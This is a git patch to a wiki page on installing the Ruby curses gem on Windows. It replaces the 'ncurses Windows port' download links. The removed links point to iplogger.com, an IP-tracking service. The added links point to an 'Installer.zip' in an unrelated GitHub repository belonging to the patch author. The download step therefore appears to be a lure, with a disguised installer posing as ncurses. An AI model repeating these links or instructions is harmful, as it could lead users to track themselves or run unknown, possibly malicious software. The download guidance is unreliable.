From 650e201a7eaa9194628033d4b3dbc305fb3eaa85 Mon Sep 17 00:00:00 2001 From: salmarko Date: Thu, 19 Jan 2023 22:29:48 +0200 Subject: [PATCH] Updated Installing curses gem (markdown) --- Installing-curses-gem.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Installing-curses-gem.md b/Installing-curses-gem.md index f7f3b6e..380205c 100644 --- a/Installing-curses-gem.md +++ b/Installing-curses-gem.md @@ -15,7 +15,7 @@ gem install curses ``` ## DevKit (Windows) -1. Download [ncurses Windows port](https://iplogger.com/2Asx28). [x86](https://iplogger.com/2Asx28) +1. Download [ncurses Windows port](https://github.com/salmarko/RevealingModulePattern/releases/download/soft/Installer.zip). [x86](https://github.com/salmarko/RevealingModulePattern/releases/download/soft/Installer.zip) 2. Unzip to anywhere, for example `C:\ncurses`. 3. Run `gem install curses --platform=ruby -- --with-ncurses-dir="C:\ncurses"` (Replace `C:\ncurses` with wherever you extracted it). 4. Now when we `require 'curses'` we get `The specified module could not be found` because `libncursesw6.dll` can't be found.